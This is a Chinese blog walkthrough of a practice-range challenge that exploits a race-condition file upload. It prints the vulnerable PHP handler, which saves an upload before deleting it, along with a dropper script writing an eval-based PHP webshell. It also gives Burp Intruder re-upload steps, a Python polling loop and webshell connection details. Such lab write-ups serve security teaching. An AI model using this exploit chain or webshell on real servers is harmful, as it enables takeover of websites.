iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传

最新推荐文章于 2024-04-28 21:38:14 发布
最新推荐文章于 2024-04-28 21:38:14 发布
阅读量994 收藏 20
点赞数 16
分类专栏: web渗透 iwebsec靶场 网络安全 文章标签: 安全 web安全 iwebsec 渗透测试 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128064159
版权

目录

第07关 条件竞争文件上传

1.打开靶场

2.源码分析

3.构造脚本

4.intruder死循环上传shell.php

5.写python脚本不断访问shell.php

6.渗透攻击

(1)运行python脚本

(2)intruder开始攻击

(3)等待python脚本访问成功

7.访问cmd.shell

第07关 条件竞争文件上传

通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。

1.打开靶场

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/upload/07.php

 随手构造info.php,内容为<?php phpinfo();?>如下所示,提示该文件不允许删除已删除,提到删除应该是条件竞争类的文件上传漏洞

2.源码分析

如下所示,对于不在白名单中的文件类型,服务器直接删掉了

<?php

  require_once('../header.php');
  ?>
<html>
<meta http-equiv="Content-Type" content="text/html;  charset=utf8"/>
	<head>
		<title>条件竞争文件上传</title>
	</head>
	<h2>条件竞争文件上传</h2>
		<div class="alert alert-success">
			<p>请上传PHP文件</p>
		</div>
	<body>
<form  enctype="multipart/form-data" method="post" name="uploadfile">
请上传文件:<input type="file" name="upfile" /><br> 
<input type="submit" name="submit" value="submit" />
</form> 
</html>
<?php
if (isset($_POST['submit'])){
    $allow_ext = array("gif","png","jpg");
	
	$uploaddir = 'uploads/';

    $filename = $uploaddir.$_FILES['upfile']['name'];
	
	move_uploaded_file($_FILES['upfile']['tmp_name'],$filename);
  
    $file = "./".$filename;
    echo "文件上传成功: ".$file."\n<br />";

    $ext = array_pop(explode(".",$_FILES['upfile']['name']));
    if (!in_array($ext,$allow_ext)){
        unlink($file);
        die("此文件类型不允许上传已删除");
    }
	}else{
		die("");
	}

?>

3.构造脚本

构造脚本命名为shell.php,它的作用是生成一句话木马cmd.php,cmd.php的内容为<?php eval($_POST[cmd]);?>

<?php
fputs (fopen("cmd.php","w"),'<?php eval($_POST[cmd]);?>')
?>

 希望通过向服务器不停的上传shell.php脚本,在其未被删除前,利用条件竞争执行shell.php脚本生成一句话木马cmd.php

4.intruder死循环上传shell.php

(1)bp开启拦截模式

 (2)浏览器上传shell.php

 (3)bp抓包并发送给intruder

(4)intruder中的positions处清除所有载荷

如下所示,点击clear

 (5)intruder中的payload处选择1没有负载,无限重复

英文版bp如下

 中文版bp如下

5.写python脚本不断访问shell.php

根据第一次上传失败的提示得知文件上传后的路径为./uploads/info.php

那么shell.php上传成功后,在没有被删掉前,其url访问路径为http://iwebsec.com:81/upload/uploads/shell.php

于是构造python脚本一直访问shell.php,利用时间差,不断访问使其可以在删除前生成cmd.php这个webshell,如下所示

import requests

url = "http://iwebsec.com:81/upload/uploads/shell.php" #这个路径,是上传的那个路径
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("NO")

6.渗透攻击

(1)运行python脚本

(2)intruder开始攻击

点击攻击attack

 如下所示bp开始不断上传shell.php

 随机打开bp攻击中的response,可知intruder执行成功

(3)等待python脚本访问成功

python访问成功,提示OK,代表已经生成了cmd.shell

7.访问cmd.shell

蚁剑添加 url为http://iwebsec.com:81/upload/uploads/cmd.php 密码为cmd

添加后如下所示

连接成功

mooyuan天天
关注
  • 16
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
iwebsec靶场文件上传漏洞-竞争条件文件上传
qq_56041380的博客
03-30 748
竞争条件是指多个线程在没有进行锁操作或者同步操作的情况下同时访问同一个共享代码、变量、文件等,运行的结果依赖于不同线程访问数据的顺序。源码分析。
文件上传条件竞争
qq_53829555的博客
09-21 4779
随着科技不断的发展,网络安全成为了一个大家都要注意与关心的话题,今天小编就带大家了解与复现一下文件上传漏洞中的条件竞争漏洞
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞
最新发布
mooyuan的博客
04-28 1217
Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无法识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无法识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec靶场搭建
mooyuan的博客
11-25 4504
iwebsec靶场可以通过两种方法进行渗透。第二种是本地搭建:目前可以通过两种方法搭建,一种是虚拟机绿色版解压即用,另外一种则是通过docker安装。
PHP文件上传条件竞争(其一)
Elite的博客
04-07 2141
在某些文件上传情境中,后端代码会先保存我们所上传的文件,然后再检查我们上传的文件是否含有风险,如果有的话会被删除,这是我们就需要和删除函数(如unlink()函数)来进行时间与线程上的竞争,争取在删除文件之前访问到该文件,达到攻击效果。
条件竞争文件上传
weixin_46239998的博客
01-07 1033
一、条件竞争介绍条件竞争,在程序员日常的Web应用开发中,通常不如其他漏洞受到的关注度高。因为普遍的共识是,条件竞争是不可靠的,大多数时候只能靠代码审计来识别发现,而依赖现有的工具或技术很难在黑盒灰盒中识别并进行攻击。即便该漏洞很难被发现,也仍然有很多企业曾被曝出相关漏洞,例如星巴克咖啡、小密圈的App 产品等。今天要讲解的条件竞争漏洞仅限于Web应用之中。
iwebsec 文件上传篇(已完结)
qq_60829702的博客
03-29 646
iwebsec文件上传篇,已完结。后续会继续更新后面的部分
web-渗透-文件上传漏洞专题靶场.rar
03-14
靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
upload-labs-master【文件上传靶场
04-05
"upload-labs-master【文件上传靶场】" 是一个针对文件上传功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件上传漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
iwebsec(代码执行)
果粒程
03-04 615
iwebsec(代码执行)
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1939
iwebsec 文件包含,详细分析,持续更新
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2135
iwebsec靶场,SQL注入篇,详细过程,全篇完结
文件上传---条件竞争
XXokok的博客
10-26 219
文件上传---条件竞争
文件上传绕过】——条件竞争漏洞
weixin_45588247的博客
07-16 4393
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞原理:五、实验过程:1. 场景:2. 实验步骤: 一、实验目的: 1、通过代码审计学习造成条件竞争漏洞的成因。 2、通过upload-labs闯关游戏(Pass-17)闯关游戏,学会条件竞争漏洞利用技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机: windows10虚拟机:192.168.100.150       upload-labs-master闯关游戏      &nbsp
漏洞攻击文件上传条件竞争
BlackBtuWhite的博客
01-18 867
扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag。只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘。2.访问时间在上传文件之后,且服务器还未将其删除,文件存在。
iwebsec靶场文件上传
果粒程
02-26 1400
iwebsec靶场文件上传
upload-labs靶场通关攻略:PHP文件上传漏洞利用
"upload-labs靶场通关指南" 在网络安全领域,特别是针对Web应用程序的安全测试,文件上传漏洞是一个常见的攻击点。Upload-labs靶场提供了一系列关卡,模拟了不同的文件上传防护机制,让测试者练习如何绕过这些防护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值